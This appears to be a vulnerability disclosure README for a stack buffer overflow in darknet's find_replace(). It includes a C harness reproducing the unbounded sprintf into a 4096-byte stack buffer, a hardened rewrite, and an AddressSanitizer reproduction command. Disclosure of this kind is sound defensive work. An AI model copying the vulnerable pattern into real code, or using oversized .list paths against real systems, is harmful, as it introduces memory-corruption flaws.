0xiviel: Upload README.md with huggingface_hub (commit 9de94f0, verified)

PoC: Stack Buffer Overflow in find_replace() — pjreddie/darknet

Vulnerability

find_replace() in src/utils.c:221 uses sprintf(buffer, "%s", str) to copy its input string into a fixed char buffer[4096] on the stack with no length check. Any input of 4096 bytes or more overflows the buffer, since the terminating NUL no longer fits. The function is reached with attacker-controlled file paths read from .list training data files, so an over-long path in such a file is enough to corrupt the stack.
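The two forms side by side, as an added example that is not the repository's poc_sprintf_overflow.c nor darknet's own code: find_replace_vuln() reproduces the function as described above (4096-byte stack buffer, unbounded sprintf), and find_replace_safe() is one hardened rewrite with a bounded copy, an explicit output size and a failure return instead of silent truncation. The .list-style paths and the "images"/"labels" replacement pair are constructed for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Vulnerable form, reproducing the find_replace() described above:
 * the input is copied into a fixed 4096-byte stack buffer with sprintf
 * and no length check. The final sprintf into output is unbounded too.
 * Only call this with inputs shorter than 4096 bytes unless you are
 * deliberately triggering the overflow under AddressSanitizer. */
void find_replace_vuln(char *str, char *orig, char *rep, char *output)
{
    char buffer[4096] = {0};
    char *p;

    sprintf(buffer, "%s", str);             /* overflows when strlen(str) >= 4096 */
    if (!(p = strstr(buffer, orig))) {
        sprintf(output, "%s", str);
        return;
    }
    *p = '\0';
    sprintf(output, "%s%s%s", buffer, rep, p + strlen(orig));
}

/* Hardened form (added here, not darknet's code): the caller passes the
 * output size, the input is rejected if it cannot fit in the scratch
 * buffer, and a truncated result is reported as an error (-1), never
 * returned as if it were complete. Returns 0 on success. */
int find_replace_safe(const char *str, const char *orig, const char *rep,
                      char *output, size_t outsize)
{
    char buffer[4096];
    /* Look for the NUL within the scratch buffer's capacity only; a string
     * without one in the first 4096 bytes would not fit with its NUL. */
    const char *nul = memchr(str, '\0', sizeof buffer);
    if (!nul)
        return -1;
    size_t len = (size_t)(nul - str);
    memcpy(buffer, str, len + 1);

    char *p = strstr(buffer, orig);
    if (!p) {
        if (len + 1 > outsize)
            return -1;
        memcpy(output, buffer, len + 1);    /* unchanged, but bounds-checked */
        return 0;
    }
    *p = '\0';
    int n = snprintf(output, outsize, "%s%s%s", buffer, rep, p + strlen(orig));
    if (n < 0 || (size_t)n >= outsize)      /* result did not fit: refuse */
        return -1;
    return 0;
}

int main(int argc, char **argv)
{
    char out[8192];
    /* Constructed sample inputs: a normal .list entry and an oversized one
     * of the kind an attacker could place in a training list file. */
    const char *normal = "data/images/000001.jpg";
    char *huge = malloc(5001);
    memset(huge, 'A', 5000);
    huge[5000] = '\0';

    if (find_replace_safe(normal, "images", "labels", out, sizeof out) == 0)
        printf("safe: %s\n", out);
    printf("safe on 5000-byte path: %s\n",
           find_replace_safe(huge, "images", "labels", out, sizeof out) == 0
               ? "ok" : "rejected");

    /* Pass any argument to feed the oversized path to the vulnerable form;
     * build with -fsanitize=address to see the stack-buffer-overflow report. */
    if (argc > 1)
        find_replace_vuln(huge, "images", "labels", out);

    free(huge);
    return 0;
}
```

Run without arguments to see the hardened function accept the normal path and reject the oversized one; run with any argument under ASan to reproduce the overflow in find_replace_vuln().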

Files

  • poc_sprintf_overflow.c — standalone harness that demonstrates the overflow using the vulnerable function copied verbatim from src/utils.c:216-230

Reproduction

gcc -fsanitize=address -fno-omit-frame-pointer -O0 -g poc_sprintf_overflow.c -o poc_sprintf
./poc_sprintf

Result: AddressSanitizer: stack-buffer-overflow in find_replace

CWE

  • CWE-121 (Stack-based Buffer Overflow)
  • CWE-120 (Buffer Copy without Checking Size of Input)